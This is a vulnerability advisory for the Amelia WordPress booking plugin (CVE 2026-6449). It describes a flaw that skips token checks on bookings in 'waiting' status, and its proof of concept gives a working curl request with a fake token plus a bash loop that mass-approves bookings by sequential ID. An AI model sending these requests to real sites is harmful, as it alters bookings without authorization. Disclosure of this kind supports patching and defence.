Amelia < 2.3 – Unauthenticated Booking Status Manipulation | CVE 2026-6449

Description

The plugin is vulnerable to Improper Authorization due to a logical short-circuit flaw in authorization logic that causes token validation to be entirely skipped when a booking has a 'waiting' status. This makes it possible for unauthenticated attackers to approve any booking that is in 'waiting' status by sending a crafted request to the publicly-accessible admin-ajax endpoint.

Proof of Concept

. Ensure the Amelia Booking plugin is installed with at least one service and provider configured.

2. Create a booking that has "waiting" status (this is the default for waiting list bookings, or manually set via the admin panel).

3. As an unauthenticated user, approve the booking with a completely fake token:
```
curl -s "https://target.com/wp-admin/admin-ajax.php?action=wpamelia_api&call=/bookings/success/1&token=FAKEFAKEXX"
```

4. The response returns an HTML success page ("approved" fallback page), and the booking status changes from "waiting" to "approved" in the database.

5. Verify the status change:
```sql
SELECT id, status FROM wp_amelia_customer_bookings WHERE id=1;
-- Result: status = 'approved' (was 'waiting')
```

6. Mass approval is trivial since booking IDs are sequential:
```
for i in $(seq 1 100); do
  curl -s "https://target.com/wp-admin/admin-ajax.php?action=wpamelia_api&call=/bookings/success/$i&token=FAKE"
done
```